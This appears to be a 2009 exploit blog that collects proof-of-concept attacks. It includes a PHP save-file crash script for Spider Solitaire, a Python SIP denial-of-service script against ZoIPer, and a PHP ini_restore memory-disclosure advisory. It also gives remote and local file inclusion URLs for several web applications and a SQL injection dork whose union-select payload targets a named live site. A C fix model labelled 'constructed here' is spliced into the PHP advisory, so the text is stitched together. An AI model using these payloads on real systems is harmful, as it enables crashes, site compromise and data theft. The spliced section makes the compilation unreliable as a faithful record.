Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

<?php
/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file (spider.sav) will result in a local crash
of Spider Solitaire
*/
$username = "pwn"; // Replace with your computer username
$file = "spider.sav";
$junk = "Spider Solitaire Local Crash";

// Write the junk save file locally, then copy it over the real one
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle, $junk);
fclose($handle);
$file2 = "C:/Documents and Settings/" . $username . "/My Documents/spider.sav";
if (!copy($file, $file2)) {
    die("Can't copy file");
} else {
    echo "File successfully copied. Open Spider Solitaire and load the last saved game";
}
?>

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os


def main(argc, argv):

    if len(argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + argv[0] + " \n")

    target_host = argv[1]
    target_port = 5060

    # SIP INVITE whose Call-Info header value is only whitespace (the bad chars above)
    evil_packet = \
"\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"

    os.system("cls")
    print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
    print "[+] Exploited By Gr33n_G0bL1n\r\n"
    print "[+] Connecting to %s on port %d\r\n" % (target_host, target_port)

    # UDP: connect() only fixes the destination, sendall() emits one datagram
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((target_host, target_port))
        print "[+] Trying To Send Evil Packet...\r\n"
        s.sendall(evil_packet)
        s.close()
        print "[+] Done!\r\n"
    except socket.error:
        print "[x] Connection Error!\r\n"


if __name__ == "__main__":
    sys.exit(main(len(sys.argv), sys.argv))

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure


[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- Dis.: 10.07.2009
- Pub.: 06.08.2009

Risk: High

Affected Software:
- PHP 5.3.0
- PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore - Restores the value of a configuration option

ini_restore ( string $varname )

--- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem lies in the restoring of PHP configuration entries. To
demonstrate it, we first set an entry via the ini_set() function. When we
then call ini_restore(), the corresponding variable in the PG() globals can
be left pointing at an arbitrary part of memory.

---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage TSRMLS_DC) /* {{{ */
{
    if (ini_entry->modified) {
        if (ini_entry->on_modify) {
            zend_try {
                /* even if on_modify bails out, we have to continue on with restoring,
                   since there can be allocated variables that would be freed on MM shutdown
                   and would lead to memory corruption later ini entry is modified again */
                ini_entry->on_modify(ini_entry, ini_entry->orig_value, ini_entry->orig_value_length,
                                     ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3,
                                     stage TSRMLS_CC);
            } zend_end_try();
        }
        if (ini_entry->value != ini_entry->orig_value) {
            efree(ini_entry->value);
        }
        ini_entry->value = ini_entry->orig_value;
        ini_entry->value_length = ini_entry->orig_value_length;
        ini_entry->modified = 0;
        ini_entry->orig_value = NULL;
        ini_entry->orig_value_length = 0;
        if (ini_entry->modifiable >= (1 << 3)) {
            ini_entry->modifiable >>= 3;
        }
    }
    return 0;
}
---zend_ini.c---

The modified flag is reset, so the entry is no longer considered modified.
The return value of ini_entry->on_modify() is never checked, so when the
handler fails the PG() variable is left pointing outside valid memory.

To demonstrate this issue:

---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php
<?php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct ($­|ma: no-cache)
in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (¤^j|ma: no-cache)
in Unknown on line 0
---example0 (5.2.10/5.3.0)---

The problem is triggered by ini_restore("session.save_path"). To observe it,
we need to call some function that reads the PG() variable afterwards, such
as session_start().

---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies
127# cat /www/file.php
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7
PHP Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

127# curl http://localhost/file.php

Warning: include() [function.include]: open_basedir restriction in
effect. File(B) is not within the allowed path(s): (°?e»Hup») in
/www/file.php on line 7

Warning: include(B) [function.include]: failed to open stream:
Operation not permitted in /www/file.php on line 7

Warning: include() [function.include]: Failed opening 'B' for
inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on
line 7

---example1 (5.3.0)---

PG(open_basedir) is now out of range, so any function (such as include())
that reports it with

php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in
effect. File(%s) is not within the allowed path(s): (%s)", path,
PG(open_basedir));

will print the contents of memory.

Examples:
---
Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (¤©f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (,ªf»aaaaaa) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (?¬f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (ÈËe»ef_root)
in /www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (4Íe»r.ini) in
/www/ssij.php on line 8
---

Variables in PG may therefore take any value, so code such as

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC))

can be manipulated.

But zend_ini.c is not the only place with an issue. When we use ini_set()
and then ini_restore() on error_log, PHP crashes.

The function OnUpdateErrorLog does not check whether new_value is empty (a
NULL pointer), which leads to the crash.

---main.c---
static PHP_INI_MH(OnUpdateErrorLog)
{
    ...
    /* Only do the safemode/open_basedir check at runtime */
    if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS)
        && strcmp(new_value, "syslog")) {
    ...
---main.c---

strcmp(3) is called on new_value, so new_value must not be NULL.

Here:

STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
error_log, php_core_globals, core_globals)

the default value of error_log is NULL:

...("error_log", NULL,...

so if we set some string and then remove it again, PHP crashes:

127# php -r 'ini_set("error_log","A");ini_restore("error_log");'
Segmentation fault (core dumped)

127# gdb -q php
(gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");'
Starting program: /usr/local/bin/php -r
'ini_set("error_log","A");ini_restore("error_log");'

Program received signal SIGSEGV, Segmentation fault.
0x288ee410 in strcmp () from /lib/libc.so.7

bt:
#0 0x288ee410 in strcmp () from /lib/libc.so.7
#1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0,
   new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0, stage=16)
   at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354
#2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80, stage=16)
   at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55
#3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log",
   name_length=10, stage=16)
...

Functions like OnUpdateErrorLog should check that new_value is not a NULL
pointer.
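As an added example (constructed here, not PHP's own code), the C model below shows the two fixes the analysis calls for: the restore path frees the old value only after on_modify has accepted orig_value, so the PG() slot is never left pointing at freed memory, and the error_log handler tolerates the NULL default that the backtrace shows reaching strcmp(). The ini_entry_t struct, the ';' rejection rule and all function names are assumptions standing in for the Zend internals.

```c
#include <stdlib.h>
#include <string.h>
/* Constructed model of the zend_ini.c restore path; not PHP's own code. */
#define SUCCESS 0
#define FAILURE (-1)
typedef struct {
    char *value, *orig_value;   /* current value; value saved by ini_set (NULL when the default was NULL) */
    int modified;
    int (*on_modify)(char *new_value, char **target);
    char **target;              /* the PG() slot the handler writes */
} ini_entry_t;
/* Modelled on OnUpdateErrorLog with the missing NULL check added: without it,
 * restoring to the NULL default runs strcmp(NULL, "syslog") and segfaults.
 * The ';' rule is a constructed stand-in for the runtime checks that can fail. */
int on_update_error_log(char *new_value, char **target) {
    if (new_value == NULL) { *target = NULL; return SUCCESS; }
    if (strcmp(new_value, "syslog") != 0 && strchr(new_value, ';')) return FAILURE;
    *target = new_value;
    return SUCCESS;
}
int ini_set_entry(ini_entry_t *e, const char *v) {
    char *copy = strcpy(malloc(strlen(v) + 1), v);   /* heap copy, as the engine makes */
    if (e->on_modify(copy, e->target) != SUCCESS) { free(copy); return FAILURE; }
    if (e->modified) free(e->value); else { e->orig_value = e->value; e->modified = 1; }
    e->value = copy;
    return SUCCESS;
}
/* Hardened restore: the old buffer is freed only after the handler accepted
 * orig_value, so PG() is never left pointing at freed memory. */
int ini_restore_entry(ini_entry_t *e) {
    if (!e->modified) return SUCCESS;
    if (e->on_modify(e->orig_value, e->target) != SUCCESS) return FAILURE;
    if (e->value != e->orig_value) free(e->value);
    e->value = e->orig_value; e->orig_value = NULL; e->modified = 0;
    return SUCCESS;
}
/* Returns 0 when both advisory cases behave: error_log restored to its NULL default
 * without the strcmp() crash, and a rejected restore leaving PG() on the live value. */
int check_restore_paths(void) {
    char *pg = NULL;   /* stands in for PG(error_log) */
    ini_entry_t e = { NULL, NULL, 0, on_update_error_log, &pg };
    if (ini_set_entry(&e, "A") != SUCCESS || ini_restore_entry(&e) != SUCCESS) return 1;
    if (pg != NULL || e.value != NULL || e.modified) return 2;
    static char rejected[] = "a;b";          /* a default the handler refuses */
    ini_entry_t r = { rejected, NULL, 0, on_update_error_log, &pg };
    if (ini_set_entry(&r, "A") != SUCCESS || ini_restore_entry(&r) != FAILURE) return 3;
    int ok = (pg == r.value && r.modified); /* PG() still points at an allocated buffer */
    free(r.value);
    return ok ? 0 : 4;
}
```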

--- 2. Fix ---
(5.3.0):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

(5.2.10):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c

--- 3. Greets ---
stas

sp3x Infospec Chujwamwdupe p_e_a pi3

--- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl


playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

I think this bug was published by
ahmadbady [kivi_hacker666@yahoo.com] for playSMS version 0.9.3,
but the vendor still hasn't fixed the bug in playSMS version 0.9.4,
so it's not the same version, right? :D

colek-colek
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

Sunday, October 4, 2009

jasakom has been hacked

Redcat Media SQL Injection Vulnerability

[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 October 2009 (Indonesia)
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
include/functions.php

require_once("$rd/include/utilfunctions.php");

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
admin/includes/createemails.php

require_once($ROOTDIR.'admin/functions/general.php');

[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]
